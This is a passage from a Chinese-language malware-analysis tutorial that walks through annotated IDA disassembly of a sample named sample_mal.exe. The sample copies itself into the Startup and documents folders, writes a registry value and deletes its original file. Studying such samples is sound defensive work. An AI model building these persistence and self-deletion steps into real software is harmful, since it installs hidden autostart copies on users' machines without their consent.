1.5.2 反組譯並觀察重要邏輯
接下來用 IDA 打開 sample_mal.exe，觀察幾段重要的程式邏輯。
- 首先來看複製0.exe和1.exe的地方。
;-----------------------------------------------------------------------
; sample_mal.exe, excerpt as displayed by IDA (x86 32-bit; Win32 stdcall
; imports reached through ds:__imp__*). IDA shows stack variables relative
; to esp, so the same variable appears as esp+85Ch+x or esp+860h+x
; depending on how many pushes precede the instruction.
;
; What this excerpt does (analyst's summary):
;   1. obtains its own path into szMe (GetModuleFileNameA)
;   2. copies itself to <special folder 7>\0.exe and <special folder 5>\1.exe
;   3. calls SetRegValue (registry write) and SelfDelete, then posts WM_QUIT
; Register roles for the whole fragment:
;   esi = SHGetSpecialFolderPathA, edi = lstrcatA, ebx = CopyFileA
;-----------------------------------------------------------------------
        push    400h                    ; nSize: szMe buffer is 0x400 bytes
        lea     eax, [esp+85Ch+szMe]
        push    eax                     ; lpFilename = szMe
        push    ecx                     ; hModule, set before this excerpt (presumably NULL = current module; confirm in IDA)
        call    ds:__imp__GetModuleFileNameA@12 ; GetModuleFileNameA(x,x,x): szMe = path of the running executable
        mov     esi, ds:__imp__SHGetSpecialFolderPathA@16 ; SHGetSpecialFolderPathA(x,x,x,x)
        push    0                       ; fCreate
        push    7                       ; csidl = 7 = CSIDL_STARTUP (the user's Startup folder)
        lea     ecx, [esp+860h+szPath]
        push    ecx                     ; pszPath = szPath
        push    0                       ; hwnd
        call    esi                     ; SHGetSpecialFolderPathA(x,x,x,x): szPath = Startup folder
        mov     edi, ds:__imp__lstrcatA@8 ; lstrcatA(x,x)
        push    offset String2          ; "\\0.exe"
        lea     edx, [esp+85Ch+szPath]
        push    edx                     ; lpString1 = szPath
        call    edi                     ; lstrcatA(x,x): szPath += "\\0.exe" (unbounded concat, no length check)
        mov     ebx, ds:__imp__CopyFileA@12 ; CopyFileA(x,x,x)
        push    0                       ; bFailIfExists = FALSE -> an existing 0.exe is overwritten
        lea     eax, [esp+85Ch+szPath]
        push    eax                     ; lpNewFileName = szPath
        lea     ecx, [esp+860h+szMe]
        push    ecx                     ; lpExistingFileName = szMe
        call    ebx                     ; CopyFileA(x,x,x): self -> Startup\0.exe (persistence: Startup items run at logon)
        push    0                       ; fCreate
        push    5                       ; csidl = 5 = CSIDL_PERSONAL (the user's documents folder)
        lea     edx, [esp+860h+szPath]
        push    edx                     ; pszPath = szPath (buffer reused)
        push    0                       ; hwnd
        call    esi                     ; SHGetSpecialFolderPathA(x,x,x,x): szPath = documents folder
        push    offset a1_exe           ; "\\1.exe"
        lea     eax, [esp+85Ch+szPath]
        push    eax                     ; lpString1 = szPath
        call    edi                     ; lstrcatA(x,x): szPath += "\\1.exe"
        push    0                       ; bFailIfExists = FALSE
        lea     ecx, [esp+85Ch+szPath]
        push    ecx                     ; lpNewFileName = szPath
        lea     edx, [esp+860h+szMe]
        push    edx                     ; lpExistingFileName = szMe
        call    ebx                     ; CopyFileA(x,x,x): self -> <documents>\1.exe
        ; Inline strlen(szPath): eax walks the string, edx = szPath + 1.
        ; After the loop eax points one past the NUL, so eax - edx is the
        ; number of bytes before the terminator.
        lea     eax, [esp+858h+szPath]
        lea     edx, [eax+1]
loc_401443:
        mov     cl, [eax]
        inc     eax
        test    cl, cl
        jnz     short loc_401443        ; repeat until the NUL byte has been consumed
        sub     eax, edx                ; eax = strlen(szPath)
        push    eax                     ; IDA labels this "path", but the value pushed is the length computed above; confirm against SetRegValue
        lea     eax, [esp+85Ch+szPath]
        push    eax                     ; root = szPath (the path of the 1.exe copy)
        call    ?SetRegValue@@YAHPAUHKEY__@@PAD11H@Z ; SetRegValue(HKEY__ *,char *,char *,char *,int); __cdecl per the mangled name
        add     esp, 8                  ; caller cleans the two arguments pushed above; the other three of the five declared parameters are not pushed in this excerpt -- check the callee in IDA
        call    ?SelfDelete@@YAHXZ      ; SelfDelete(void): deletes the original executable (body not in this excerpt)
        push    0                       ; nExitCode
        call    ds:__imp__PostQuitMessage@4 ; PostQuitMessage(x)
        jmp     loc_40151F              ; target lies outside this excerpt
- 其中 `SetRegValue` 與 `SelfDelete` 分別用來設置註冊表值以及將自身刪除。
- 其中 x86 使用中括號 `[]` 表示記憶體位址：`mov ecx, [eax]` 把地址 EAX 處的值讀入 ECX；`mov [eax], ebx` 把 EBX 的值寫入地址為 EAX 的記憶體。